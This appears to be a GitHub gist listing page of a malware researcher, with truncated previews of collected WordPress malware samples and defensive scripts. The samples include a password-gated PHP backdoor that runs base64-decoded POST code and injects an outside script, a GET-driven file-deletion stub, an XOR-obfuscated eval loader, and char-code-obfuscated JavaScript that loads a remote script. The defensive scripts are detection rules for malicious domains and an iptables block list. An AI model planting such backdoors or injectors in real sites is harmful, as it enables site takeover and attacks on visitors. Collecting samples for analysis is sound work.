Salvador Aguilar malwador
⚔️
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?><rss version="2.0" | |
| xmlns:content="http://purl.org/rss/1.0/modules/content/" | |
| xmlns:wfw="http://wellformedweb.org/CommentAPI/" | |
| xmlns:dc="http://purl.org/dc/elements/1.1/" | |
| xmlns:atom="http://www.w3.org/2005/Atom" | |
| xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" | |
| xmlns:slash="http://purl.org/rss/1.0/modules/slash/" | |
| > | |
| <channel> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php error_reporting(0);ini_set('display_errors', 0); if(isset($_POST['m']) && md5($_POST['m']) == "8b83a84918c63d1e9b9ab82e07e20539" ) {$a = base64_decode($_POST['a']);file_put_contents('_a','<?php '.$a);$a='_a';if(f ile_exists($a)){include($a);unlink($a);}} ?><script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js'></script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(isset($_GET['name'])){ | |
| if(function_exists("unlink")){ | |
| @unlink($_GET['name']); | |
| @unlink($_GET['name']); |
malwador
/ gist:985a1979dc83357dd1a256c69e06363c
Created
September 17, 2020 21:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1 | |
| 2 <?php | |
| 3 | |
| 4 /** | |
| 5 * WordPress Diff bastard child of old MediaWiki Diff Formatter. | |
| 6 * | |
| 7 * Basically all that remains is the table structure and some method names. | |
| 8 * | |
| 9 * @package WordPress | |
| 10 * @subpackage Diff |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Sitemaps: WP_Sitemaps_Posts class | |
| * | |
| * Builds the sitemaps for the 'post' object type. | |
| * | |
| * @package WordPress | |
| * @subpackage Sitemaps | |
| * @since 5.5.0 | |
| */ |
malwador
/ firstbackdoor.php
Created
October 27, 2020 22:22
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $oIndex = 'PGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJhci1rdyI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MiI+Cjx0aXRsZT5oYWNrZWQgQnkgQ2hpbmFmYW5zPC90aXRsZT4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj5pbWd7b3BhY2l0eTowLjU7LXdlYmtpdC10cmFuc2l0aW9uOmFsbCAyNTBtcyBlYXNlOy1tb3otdHJhbnNpdGlvbjphbGwgMjUwbXMgZWFzZTstby10cmFuc2l0aW9uOmFsbCAyNTBtcyBlYXNlO3RyYW5zaXRpb246YWxsIDI1MG1zIGVhc2U7fWltZzpob3ZlcntvcGFjaXR5OjE7fXRleHRhcmVhe3Jlc2l6ZTpub25lO308L3N0eWxlPgo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0iaGFja2VkIEJ5IENoaW5hZmFucyI+CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJoYWNrZWQgQnkgQ2hpbmFmYW5zIj4KPHN0eWxlPgpBOmxpbmsge3RleHQtZGVjb3JhdGlvbjogbm9uZTt9CkE6YWN0aXZlIHt0ZXh0LWRlY29yYXRpb246IG5vbmU7fQouYXV0by1zdHlsZTEgewoJY29sb3I6ICNGRjAwMDA7Cn0KLmF1dG8tc3R5bGUyIHsKCXRleHQtYWxpZ246IGNlbnRlcjsKfQouYXV0by1zdHlsZTMgewoJY29sb3I6ICMwMEZGM0M7Cn0KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keSBiZ2NvbG9yPSIjMTQxNDE0Ij4KPGRpdiBhbGlnbj0iY2VudGVyIj4KCSAgICAgICAgPHA+Jm |
malwador
/ gist:12925c42ace466b2f0098e8348558556
Created
December 3, 2020 20:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $001 = /[a-z0-9]{0,5}(.)?saleforyou\.org/ // saleforyou[.]org is reported to be used for a WP Login stealer. | |
| $002 = /[a-z0-9]{0,5}(.)?bingstyle\.com/ // same as above | |
| $003 = "www.24hod.sk" nocase | |
| $004 = /[a-z0-9]{4,64}\.designmysite\.pro/ //Phishing and malware distribution | |
| $005 = "times2day.com" nocase //redirector | |
| $006 = "lundybright.fr" nocase // https://labs.sucuri.net/face-mask-links-injected-into-wordpress-database/ | |
| $007 = "collectfasttracks.com" nocase | |
| $008 = "digestcolect.com" nocase | |
| $009 = "balantfromsun.com" nocase | |
| $010 = "trackstatisticsss.com" nocase |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php preg_replace("\234\x4d\x37\x9c\xf0\244\x2b\176"^"\xbf\145\31\xb7\331\207\x42\x1b","\xe\x92\xba\256\x5e\272\xf6\x47\x61\xfd\x19\320\x36\256\xc\311\xa9\x4f\302\344\xe\x6c\xb8\72\374\x39\56\x99\371\x30\xef\x1e\141\x69\74\156\270"^"\x6b\xe4\333\xc2\166\335\214\x2e\17\x9b\165\xb1\102\313\x24\xab\xc8\74\247\322\72\63\xdc\137\237\x56\112\xfc\321\x17\263\x2f\x46\x40\25\107\x83","\xe9\x2\xec\156\336\272\x84\270\30\362\231\x48\x70\367\x96\x9e\15\370\373\xe3\253\60\xaf\171\273\55\347\5\xef\xac\x4f\x8d\324\17\x1b\x29\xee\x18\x4f\x9f\x9d\26\x62\xee\343\135\xa1\x4\66\33\146\17\14\64\xba\x65\345\x62\xdf\153\x1d\xcb\x28\x8c\x5f\132\x70\243\xe6\252\14\5\221\x57\50\x62\313\xc\x84\xe8\x25\210\x5a\x8\132\xee\xf5\xc0\353\xa5\130\17\x33\315\x97\x29\215\x53\41\236\xbd\xea\x58\x76\x13\xb0\220\x81\x5\xbf\xa6\112\xbd\65\311\354\x12\xc5\31\x18\xd0\x77\164\206\174\xef\3\112\xa4\352\xe9\x0\270\131\xa\71\126\200\xb8\311\17\104\xc7\151\x7f\356\x4c\x9\201\xae\233\250\340\54\x75\350\xc4\367\1\1\xd1\71\x70\x26\x95\xfa\222\26\x72\241\x8\ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # script para bloquear IPs de china - salvador aguilar | |
| echo "Blocking 8444 Chinese IPs via IPTABLES" | |
| echo "======================= by Sal Aguilar" | |
| iptables -A INPUT -s 1.0.1.0/24 -j DROP | |
| iptables -A INPUT -s 1.0.2.0/23 -j DROP | |
| iptables -A INPUT -s 1.0.8.0/21 -j DROP | |
| iptables -A INPUT -s 1.0.32.0/19 -j DROP | |
| iptables -A INPUT -s 1.1.0.0/24 -j DROP | |
| iptables -A INPUT -s 1.1.2.0/23 -j DROP | |
| iptables -A INPUT -s 1.1.4.0/22 -j DROP |